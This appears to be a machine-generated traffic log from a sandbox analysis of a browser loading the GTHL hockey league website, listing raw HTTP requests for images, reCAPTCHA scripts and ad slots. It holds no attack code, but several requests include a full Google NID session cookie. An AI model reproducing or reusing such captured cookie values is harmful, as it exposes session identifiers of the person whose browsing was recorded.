Source: global trafficHTTP traffic detected: GET /app/uploads/gthl/2023/07/13145939/5HealthySnacks-1024x512jpg-730x365.jpg HTTP/1.1Host: d2pr6pnwfmh0za.cloudfront.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /app/uploads/gthl/2024/11/06164616/AROUND-THE-G-TITLE-November-2024-730x411.jpg HTTP/1.1Host: d2pr6pnwfmh0za.cloudfront.netConnection: keep-alivesec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://gthlcanada.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /app/uploads/gthl/2021/07/17001307/GTHLLOGO-WEB-730x365.jpg HTTP/1.1Host: d2pr6pnwfmh0za.cloudfront.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /app/uploads/gthl/2023/03/14100611/Screen-Shot-2023-03-14-at-10.05.42-AM-e1678802821516-730x432.png HTTP/1.1Host: d2pr6pnwfmh0za.cloudfront.netConnection: keep-alivesec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://gthlcanada.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /app/uploads/gthl/2022/10/31124110/SnacksToFuelPerformance-BreakoutFall2022-730x355.jpg HTTP/1.1Host: d2pr6pnwfmh0za.cloudfront.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /app/uploads/gthl/2020/04/09100946/82137226_2705410846193604_1955700155504132096_o-730x435.jpg HTTP/1.1Host: d2pr6pnwfmh0za.cloudfront.netConnection: keep-alivesec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://gthlcanada.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /app/uploads/gthl/2023/06/26135230/GTHL-PrideParade2023-730x548.jpeg HTTP/1.1Host: d2pr6pnwfmh0za.cloudfront.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /js/bg/GaYUpI3TM2ZeJrJuY6shdNLJBEVQZd83XqI1ZKo9ZSY.js HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CI+2yQEIorbJAQipncoBCMD2ygEIlKHLAQic/swBCIWgzQEI1r3OARjBy8wBSec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.google.com/recaptcha/api2/anchor?ar=1&k=6LfHrSkUAAAAAPnKk5cT6JuKlKPzbwyTYuO8--Vr&co=aHR0cHM6Ly9ndGhsY2FuYWRhLmNvbTo0NDM.&hl=en&v=zIriijn3uj5Vpknvt_LnfNbF&size=invisible&cb=s7x76yuho1viAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: NID=517=i4E8sm-BN75bnGkPw4VW8uy51aQ8ounjntfNX2fu8MFJNuIvCX0dRBy-XkHqHwKOVFSSaC2nqfULsnHhY3TzIXHWC90jS3Wi2BINtQIDr1LJvZE4Ud-byTNL9Q04Nd1-ydmJvrWYY5vORspW6soJ1bMj20dq8UvPjgkw2sOvmuTUanqu
Source: global trafficHTTP traffic detected: GET /recaptcha/api2/webworker.js?hl=en&v=zIriijn3uj5Vpknvt_LnfNbF HTTP/1.1Host: www.google.comConnection: keep-aliveAccept: */*X-Client-Data: CI+2yQEIorbJAQipncoBCMD2ygEIlKHLAQic/swBCIWgzQEIrJ7OAQjkr84BCMO2zgEIvbnOAQjtvM4BCLu9zgEI1r3OAQjMv84BGMHLzAEYva7OARidsc4BSec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: workerReferer: https://www.google.com/recaptcha/api2/anchor?ar=1&k=6LfHrSkUAAAAAPnKk5cT6JuKlKPzbwyTYuO8--Vr&co=aHR0cHM6Ly9ndGhsY2FuYWRhLmNvbTo0NDM.&hl=en&v=zIriijn3uj5Vpknvt_LnfNbF&size=invisible&cb=s7x76yuho1viUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: NID=517=i4E8sm-BN75bnGkPw4VW8uy51aQ8ounjntfNX2fu8MFJNuIvCX0dRBy-XkHqHwKOVFSSaC2nqfULsnHhY3TzIXHWC90jS3Wi2BINtQIDr1LJvZE4Ud-byTNL9Q04Nd1-ydmJvrWYY5vORspW6soJ1bMj20dq8UvPjgkw2sOvmuTUanqu
Source: global trafficHTTP traffic detected: GET /app/uploads/gthl/2019/12/14094644/ELNIU7DXYAAM9hQ.jpg HTTP/1.1Host: d2pr6pnwfmh0za.cloudfront.netConnection: keep-alivesec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://gthlcanada.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /app/uploads/gthl/2023/08/31160426/Screen-Shot-2023-08-31-at-4.03.51-PM-e1693512300199-730x640.png HTTP/1.1Host: d2pr6pnwfmh0za.cloudfront.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /app/uploads/gthl/2024/11/14092335/0C9A0893-730x487.jpg HTTP/1.1Host: d2pr6pnwfmh0za.cloudfront.netConnection: keep-alivesec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://gthlcanada.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /app/uploads/gthl/2025/01/02154916/AROUND-THE-G-TITLE-January-2025-2-730x411.jpg HTTP/1.1Host: d2pr6pnwfmh0za.cloudfront.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /app/uploads/gthl/2024/07/17140151/IMG_1192-730x541.jpg HTTP/1.1Host: d2pr6pnwfmh0za.cloudfront.netConnection: keep-alivesec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://gthlcanada.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /app/uploads/gthl/2024/12/02164945/AROUND-THE-G-TITLE-November-2024-730x411.jpg HTTP/1.1Host: d2pr6pnwfmh0za.cloudfront.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /app/uploads/gthl/2024/11/06164616/AROUND-THE-G-TITLE-November-2024-730x411.jpg HTTP/1.1Host: d2pr6pnwfmh0za.cloudfront.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /app/uploads/gthl/2024/06/28105107/0C9A9391-730x487.jpg HTTP/1.1Host: d2pr6pnwfmh0za.cloudfront.netConnection: keep-alivesec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://gthlcanada.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /app/uploads/gthl/2024/12/05143829/0C9A4640-730x487.jpg HTTP/1.1Host: d2pr6pnwfmh0za.cloudfront.netConnection: keep-alivesec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://gthlcanada.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /app/uploads/gthl/2020/04/09100946/82137226_2705410846193604_1955700155504132096_o-730x435.jpg HTTP/1.1Host: d2pr6pnwfmh0za.cloudfront.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /recaptcha/api2/webworker.js?hl=en&v=zIriijn3uj5Vpknvt_LnfNbF HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI+2yQEIorbJAQipncoBCMD2ygEIlKHLAQic/swBCIWgzQEI1r3OARjBy8wBSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: NID=517=i4E8sm-BN75bnGkPw4VW8uy51aQ8ounjntfNX2fu8MFJNuIvCX0dRBy-XkHqHwKOVFSSaC2nqfULsnHhY3TzIXHWC90jS3Wi2BINtQIDr1LJvZE4Ud-byTNL9Q04Nd1-ydmJvrWYY5vORspW6soJ1bMj20dq8UvPjgkw2sOvmuTUanqu
Source: global trafficHTTP traffic detected: GET /js/bg/GaYUpI3TM2ZeJrJuY6shdNLJBEVQZd83XqI1ZKo9ZSY.js HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI+2yQEIorbJAQipncoBCMD2ygEIlKHLAQic/swBCIWgzQEI1r3OARjBy8wBSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: NID=517=i4E8sm-BN75bnGkPw4VW8uy51aQ8ounjntfNX2fu8MFJNuIvCX0dRBy-XkHqHwKOVFSSaC2nqfULsnHhY3TzIXHWC90jS3Wi2BINtQIDr1LJvZE4Ud-byTNL9Q04Nd1-ydmJvrWYY5vORspW6soJ1bMj20dq8UvPjgkw2sOvmuTUanqu
Source: global trafficHTTP traffic detected: GET /recaptcha/api2/bframe?hl=en&v=zIriijn3uj5Vpknvt_LnfNbF&k=6LfHrSkUAAAAAPnKk5cT6JuKlKPzbwyTYuO8--Vr HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CI+2yQEIorbJAQipncoBCMD2ygEIlKHLAQic/swBCIWgzQEI1r3OARjBy8wBSec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://gthlcanada.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: NID=517=i4E8sm-BN75bnGkPw4VW8uy51aQ8ounjntfNX2fu8MFJNuIvCX0dRBy-XkHqHwKOVFSSaC2nqfULsnHhY3TzIXHWC90jS3Wi2BINtQIDr1LJvZE4Ud-byTNL9Q04Nd1-ydmJvrWYY5vORspW6soJ1bMj20dq8UvPjgkw2sOvmuTUanqu
Source: global trafficHTTP traffic detected: GET /app/uploads/gthl/2024/11/28141908/0C9A3113-730x487.jpg HTTP/1.1Host: d2pr6pnwfmh0za.cloudfront.netConnection: keep-alivesec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://gthlcanada.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /app/uploads/gthl/2023/03/14100611/Screen-Shot-2023-03-14-at-10.05.42-AM-e1678802821516-730x432.png HTTP/1.1Host: d2pr6pnwfmh0za.cloudfront.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /app/uploads/gthl/2019/12/14094644/ELNIU7DXYAAM9hQ.jpg HTTP/1.1Host: d2pr6pnwfmh0za.cloudfront.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /app/uploads/gthl/2024/11/15144558/0C9A0952-730x487.jpg HTTP/1.1Host: d2pr6pnwfmh0za.cloudfront.netConnection: keep-alivesec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://gthlcanada.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /app/uploads/gthl/2024/11/14092335/0C9A0893-730x487.jpg HTTP/1.1Host: d2pr6pnwfmh0za.cloudfront.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /app/uploads/gthl/2024/07/17140151/IMG_1192-730x541.jpg HTTP/1.1Host: d2pr6pnwfmh0za.cloudfront.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /app/uploads/gthl/2024/06/28105107/0C9A9391-730x487.jpg HTTP/1.1Host: d2pr6pnwfmh0za.cloudfront.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /app/uploads/gthl/2024/12/05143829/0C9A4640-730x487.jpg HTTP/1.1Host: d2pr6pnwfmh0za.cloudfront.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /app/uploads/gthl/2024/11/15144558/0C9A0952-730x487.jpg HTTP/1.1Host: d2pr6pnwfmh0za.cloudfront.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /app/uploads/gthl/2024/11/28141908/0C9A3113-730x487.jpg HTTP/1.1Host: d2pr6pnwfmh0za.cloudfront.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /gampad/ads?pvsid=4461304755155343&correlator=709494525036105&eid=31088846%2C31085776%2C83321073%2C31086810%2C95340253%2C95340255&output=ldjh&gdfp_req=1&vrg=202501070101&ptt=17&impl=fifs&iu_parts=128473736%2CGTHL_BigBox_1&enc_prev_ius=%2F0%2F1&prev_iu_szs=300x600%7C300x250&ifi=1&sfv=1-0-40&sc=1&cookie_enabled=1&abxe=1&dt=1736802081707&lmt=1736802081&adxs=1239&adys=469&biw=1903&bih=953&scr_x=0&scr_y=0&btvi=0&ucis=1&oid=2&u_his=1&u_h=1080&u_w=1920&u_ah=1040&u_aw=1920&u_cd=24&u_sd=1&u_tz=-300&dmc=8&bc=31&nvt=1&uach=WyJXaW5kb3dzIiwiMTAuMC4wIiwieDg2IiwiIiwiMTI4LjAuNjYxMy4xMjAiLG51bGwsMCxudWxsLCI2NCIsW1siQ2hyb21pdW0iLCIxMjguMC42NjEzLjEyMCJdLFsiTm90O0E9QnJhbmQiLCIyNC4wLjAuMCJdLFsiR29vZ2xlIENocm9tZSIsIjEyOC4wLjY2MTMuMTIwIl1dLDBd&url=https%3A%2F%2Fgthlcanada.com%2F&vis=1&psz=300x0&msz=300x0&fws=0&ohw=0&topics=9&tps=9&htps=10&nt=1&psd=WzE1LFtudWxsLG51bGwsbnVsbCwiZGVwcmVjYXRlZF9rYW5vbiJdLG51bGwsM10.&dlt=1736802072109&idt=5963&prev_scp=lang%3Deng&adks=739091630&frm=20&eoidce=1&td=1&egid=48566&tan=ac9f98fe-8a22-4c45-9038-325d4fc698ed&tdf=2 HTTP/1.1Host: securepubads.g.doubleclick.netConnection: keep-alivesec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Browsing-Topics: ();p=P0000000000000000000000000000000Sec-Ad-Auction-Fetch: ?1Origin: https://gthlcanada.comX-Client-Data: CI+2yQEIorbJAQipncoBCMD2ygEIlKHLAQic/swBCIWgzQEI1r3OARjBy8wBSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://gthlcanada.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /gampad/ads?pvsid=4461304755155343&correlator=709494525036105&eid=31088846%2C31085776%2C83321073%2C31086810%2C95340253%2C95340255&output=ldjh&gdfp_req=1&vrg=202501070101&ptt=17&impl=fifs&iu_parts=128473736%2CGTHL_Leaderboard&enc_prev_ius=%2F0%2F1&prev_iu_szs=970x250%7C970x90%7C728x90&ifi=2&sfv=1-0-40&sc=1&cookie_enabled=1&abxe=1&dt=1736802081720&lmt=1736802081&adxs=467&adys=276&biw=1903&bih=953&scr_x=0&scr_y=0&btvi=0&ucis=2&oid=2&u_his=1&u_h=1080&u_w=1920&u_ah=1040&u_aw=1920&u_cd=24&u_sd=1&u_tz=-300&dmc=8&bc=31&nvt=1&uach=WyJXaW5kb3dzIiwiMTAuMC4wIiwieDg2IiwiIiwiMTI4LjAuNjYxMy4xMjAiLG51bGwsMCxudWxsLCI2NCIsW1siQ2hyb21pdW0iLCIxMjguMC42NjEzLjEyMCJdLFsiTm90O0E9QnJhbmQiLCIyNC4wLjAuMCJdLFsiR29vZ2xlIENocm9tZSIsIjEyOC4wLjY2MTMuMTIwIl1dLDBd&url=https%3A%2F%2Fgthlcanada.com%2F&vis=1&psz=970x0&msz=970x0&fws=0&ohw=0&topics=9&tps=9&htps=10&nt=1&psd=WzE1LFtudWxsLG51bGwsbnVsbCwiZGVwcmVjYXRlZF9rYW5vbiJdLG51bGwsM10.&dlt=1736802072109&idt=5963&prev_scp=lang%3Deng&adks=3145876704&frm=20&eoidce=1&td=1&egid=48566&tan=ac9f98fe-8a22-4c45-9038-325d4fc698ee&tdf=2 HTTP/1.1Host: securepubads.g.doubleclick.netConnection: keep-alivesec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Browsing-Topics: ();p=P0000000000000000000000000000000Sec-Ad-Auction-Fetch: ?1Origin: https://gthlcanada.comX-Client-Data: CI+2yQEIorbJAQipncoBCMD2ygEIlKHLAQic/swBCIWgzQEI1r3OARjBy8wBSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://gthlcanada.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/gthl_logo_thumb-1.png HTTP/1.1Host: gthl.s3.amazonaws.comConnection: keep-alivesec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://gthlcanada.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
